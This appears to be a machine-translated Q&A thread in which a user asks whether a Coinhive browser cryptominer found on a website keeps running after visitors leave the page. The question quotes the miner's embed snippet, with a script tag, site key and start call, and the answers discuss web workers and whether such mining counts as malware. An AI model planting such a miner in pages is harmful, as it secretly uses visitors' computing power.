Geek Answers Handbook

Website with miner script

I found that some of my users visit a site that apparently has a bitcoin JS script in its code:

<script src = "hxxps://coin-hive.com/lib/coinhive.min.js"></script><script> var miner = new CoinHive.Anonymous('3858f62230ac3c915f300c664312c63f'); miner.start(); </script>

My question is: are users still infected with this, even if they move from the page? Are these programs used only if the user has a page open in the browser?

+8
javascript web malware
source share
3 answers

are users still infected with this, even if they move away from the page?

Not

Do these programs use only if the user opens the page in a browser?

Yes, the script will only run on the website that includes it, and the page is open in the browser

UPDATE:

Additional information about this script: https://coin-hive.com/

Coinhive offers a JavaScript mine for Monero Blockchain (...) that you can embed on your site. Your users launch the miner directly in their browser

And https://coin-hive.com/documentation/miner

The miner works until you explicitly stop it again or the user moves forward .

+9
source share

Coinhive is not "malware" because it does not seem to do anything particularly dangerous to the user's computer. If so, users' computers were never “infected” with anything.

These days, it is extremely common for websites to download tons of third-party scripts and cookies in the background and do hundreds of things that you don’t know about every time you use the Internet. Most sites download a Google Analytics tracking script when you visit them, even if you did not allow them to do so. But this will not be considered malware. Most sites download persistent third-party cookies that track your presence from one site to another and create a massive profile of your online habits. That's why you can go shopping for shoes on one site, and then suddenly discover that Facebook serves you for advertising. But it is also usually not considered malware.

In terms of “harm” or “unwanted activity”, ongoing monitoring can be considered more invasive than developing a coin script. Perhaps using a coin script just uses some memory and end-user processor power, which is no different from hundreds of other javascript libraries that load in the background without your knowledge.

+5
source share

I am not familiar with the coin-hive service, but actually the script you provided contains the following lines:

  var JobThread = function() { this.worker = new Worker(CoinHive.CRYPTONIGHT_WORKER_BLOB); this.worker.onmessage = this.onReady.bind(this); ... };

As you can see, this uses Workers. I have not studied the entire script, but in any case, the use of web workers means that some operations can be performed even after the page is closed. Additional information in this post .

So, the very first answer to your question: YES, users can be infected for some time after closing the page (theoretically, if the script is written this way).

But in fact, the script appears very soon by the system itself. Also, the hive coin platform is not positioned as malware and should be safe for users. I don’t think you should worry about this.

+3
source share

More articles:


All Articles